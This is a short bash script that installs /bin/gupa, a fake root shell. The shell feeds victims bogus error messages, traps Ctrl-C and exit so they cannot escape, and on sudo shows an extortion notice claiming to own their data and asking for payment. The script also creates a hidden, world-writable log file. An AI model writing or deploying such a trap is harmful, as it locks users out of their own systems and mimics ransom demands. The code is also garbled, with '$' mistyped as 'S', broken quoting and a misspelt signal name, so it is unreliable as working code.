#!/bin/bash
cat << 'EOF' > /bin/gupa
#!/bin/bash
echo "We hope you are having a lovely day:)" >> /var/log/.gupa
ri() {
    current_directory=$(pwd)
    echo -n "root@HOSTNAME:Scurrent_directory# "
    read -r i

    if [ -n "$i" ]; then
        case "Si" in
            cd*)
                directory="S${i#cd }"
                cd "Sdirectory' 2>/dev/null
                ;;
            whoami*)
                echo "root"
                ;;
            touch*)    
                echo "Too many open files"
                ;;
            sed*)
                echo "sed: Couldn't re-allocate memory
                echo "Try running as root"
                ;;
            cat*)
                echo "cat: No such file or directory"
                ;;
            vim*)
                echo "vim: File not found/could not be created"
                ;;
            nano*)
                echo "Command 'nano' not found, did you mean:"
                echo " command 'nano' from snap nano (7.2+pkg-4057)"
                echo " command 'nano' from deb nano (6.2-1)"
                echo "See 'snap info <snapname>' for additional versions."
                ;;
            sudo*)
                echo "sudo: Seems like something is wrong"
                echo " We own you and all your data."
                echo " If you would like access please come talk to us"
                echo " You will find that for a small payment of doubaloons we can be very resonable people"
                echo "To friends and family - The Binary Basin Bandits”
                ;;
            *)
                echo "-bash: command not found: $i"
                ;;
        esac
    fi;
    ri
}
trap "ri" SIGINT SIGSTP exit;
ri
EOF

chmod +x /bin/gupa
touch /var/log/.gupa
chmod 722 /var/log/.gupa